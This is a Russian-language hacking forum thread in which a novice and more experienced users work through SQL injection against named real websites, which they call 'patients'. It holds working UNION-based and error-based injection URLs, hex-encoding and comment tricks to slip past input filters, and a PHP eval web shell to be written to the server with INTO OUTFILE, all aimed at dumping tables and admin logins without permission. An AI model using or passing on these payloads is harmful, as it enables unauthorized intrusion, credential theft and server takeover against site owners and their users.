подскажите в чём дело.. Ситуация такая, сделав запрос такого вида _http://www.witchcraft.nu/newsitem.php?id=-362+union+select+1,2,table_name,4,5,6,7,8,9,10,11%20from%20information_schema.tables%20limit%2029,1-- я получаю название таблицы "usedboard", теперь хочу прочитать содержание этой таблицы, делаю запрос такого вида _http://www.witchcraft.nu/newsitem.php?id=-362+union+select+1,2,column_name,4,5,6,7,8,9,10,11 from information_schema.columns where table_name='usedboard' LIMIT 1,1 -- поидеи как я читал этот запрос должен мне показать содерживое таблицы "usedboard", но вместо этого он мне выкидывает ошибку "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'usedboard\' LIMIT 1,1 --' at line 1" такая проблема не только с этим пациентам, с десяток разных сайтов перепробовал неполучается прочитать и ошибки не везде одинаковые пишет. P.S. только начинаю осваивать данное дело, тапками не кидаться
Возможно в другой БД твоя таблица, подбери так: Code: http://www.witchcraft.nu/newsitem.php?id=-362+and(select+1+from(select+count(*),concat((select+concat(table_schema,0x2e,table_name,0x00)+from+information_schema.columns+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)-- Потом from+db.table
Ну ты грузанул канеш.. ничего не понял с твоего запроса, я пока что на стадии изучения -5+union+select+1,..., а так мои запросы правельные? я думаю может в них я что то не правильно пишу, спасибо за помощь, а ещё буду благодарен за мануал где используются запросы твоего вида ------------------------ Наугад переберал запросы вида http://www.witchcraft.nu/newsitem.php?id=-362+union+select+1,2,id,4,5,6,7,8,9,10,11+from+usedboard+limit+1,1-- пытался найти мне нужное поле, попал только на одно существующие "ID", все не правельные выводились ошибкой "Unknown column 'login' in 'field list'", так почему же у меня неполучается прочитать какие поля существуют в usedboard
почти правильный, у тебя там на сайте magic_quotes_gpc = on поэтому нужно избегать ковычки, нужно хексить имя таблицы, т.е. сейчас у тебя так: ... where table_name='usedboard' LIMIT 1,1 -- а нужно ... where table_name=0x75736564626f617264 LIMIT 1,1 -- в мане все есть, тем более ошибка сама намекает на проблему зы предугадывая ход твоих мыслей, онлайн декодировщик в хекс http://www.string-functions.com/string-hex.aspx зыы по поводу запроса от Ereee, это error based техника, ман по ней гуглится легко, но лучше начни с основ.
спасибо за помощь, с этим разобрался, бывает такое что в бд нет логина и пароля админа, врятли да? хренова искал походу.. trololoman96 я согласен с вами что в мануале всё есть, но найти это тоже не просто, даже через поиск прочитал что если команда user() выдаёт значение username@localhost, то получается есть возможность залить шелл локально, нашёл вот такую команду "UNION SELECT 1,2,3,'<?php eval($_GET[‘e’]) ?>',5,6 INTO OUTFILE '1.php'; --" как понял к 1.php надо подставить путь который можно узнать в phpinfo на сервере пациента, но что делать с этим куском кода '<?php eval($_GET[‘e’]) ?>'? ещё путает один нюанс, тоже всё с мануалов путает немного, дело в том что все начинают делать запросы по разному вот несколько примеров -362+union+select+1,... 362+union+select+1,... 362+and(1=2)+union+select+1,... null+union+select+1,... так же в конце запроса видел разную концовку ( -- /* ), играет это какую нибудь роль? если да ткните носом в мануал где это расписано для усвоения материала
Ребят подскажите sql иньекции для dle 7.3 дабы она старая думаю вас незатруднит) ну или фак по взлому мож кто кинут с меня +!
появилась проблема посерьёзнее предыдущий в общем ситуация такая, есть пациент "avmaniacs.com", нашёл там sql inj, знаю точное кол-во стобцов, определил командой www.avmaniacs.com/review.php?id=-319+group+by+27-- , если вместо 27 поставить число 28, то появится ошибка "Unknown column '28' in 'group statement'" следовательно стобцов 27 теперь вставляю такой запрос www.avmaniacs.com/review.php?id=-319+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,27-- поидеи должна отобразится страница где покажутся несколько цифр, но мнесто этого вылазиет страница "Forbidden" что можно мне сделать??
Code: http://www.avmaniacs.com/review.php?id=319+or+1+group+by+concat_ws(0x3a,version(),0x00,rand(0)|0)+having+min(0)--+f Code: Duplicate entry '[COLOR=Magenta]5.1.56[/COLOR]:' for key 'group_key' Code: http://www.avmaniacs.com/review.php?id=319+and(select+1+from(select+count(*),/*!concat*/((select+table_name+from+information_schema./**/tables+limit+0,1),floor(rand(0)*2))x+from+information_schema./**/tables+group+by+x)a)--+f Code: Duplicate entry '[COLOR=Magenta]CHARACTER_SETS[/COLOR]1' for key 'group_key' Фильтрует union(но нам это не нужно), concat, information_schema.tables. Обходим: concat - /*!concat*/ information_schema./**/tables
спасибо за разъяснение, теперь буду знать выходит такая ошибка значит фильтруют что то из твоего кода снова ничего не понял, но нашёл более простое решение обхода фильтра "/*!union*/+/*!select*/" на двух пациентах проканало, больше не встречалось таких PHP: www.avmaniacs.com/review.php?id=-319/*!union*/+/*!select*/user(),version(),3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27-- www.ceripp.it/curriculum.php?id=-1/*!union*/+/*!select*/1,user(),3,version(),5,6-- --------------------- хрен там что оказывается получилось только узнать версию и юзера, начал узнавать table_name как тут же меня обламали с ошибками на несуществующую страницу... ------------ оказывается не всё так плохо как я думал сделав запрос вот такого вида PHP: www.ceripp.it/curriculum.php?id=-1/*!union*/+/*!select*/1,2,3,/*!table_name*/,5,6+/*!from*/+/*!information_schema.tables*/-- я получил то что хотел
Просто через error-based подбирать кол-во полей не нужно. Но и один минус - выводит только 64 символа(это не проблема, благодаря nikp ).
Такая проблема: С неизвестного URL действует скрипт, выполняющий запросы к API одного сервиса. Какие запросы выяснить, конечно же, можно. Но можно ли выяснить URL этого скрипта? //сори, если не туда С:
А где все эти действия вы видите ? там где вы это видети наверное есть логи, можно по ним аринтироватся.
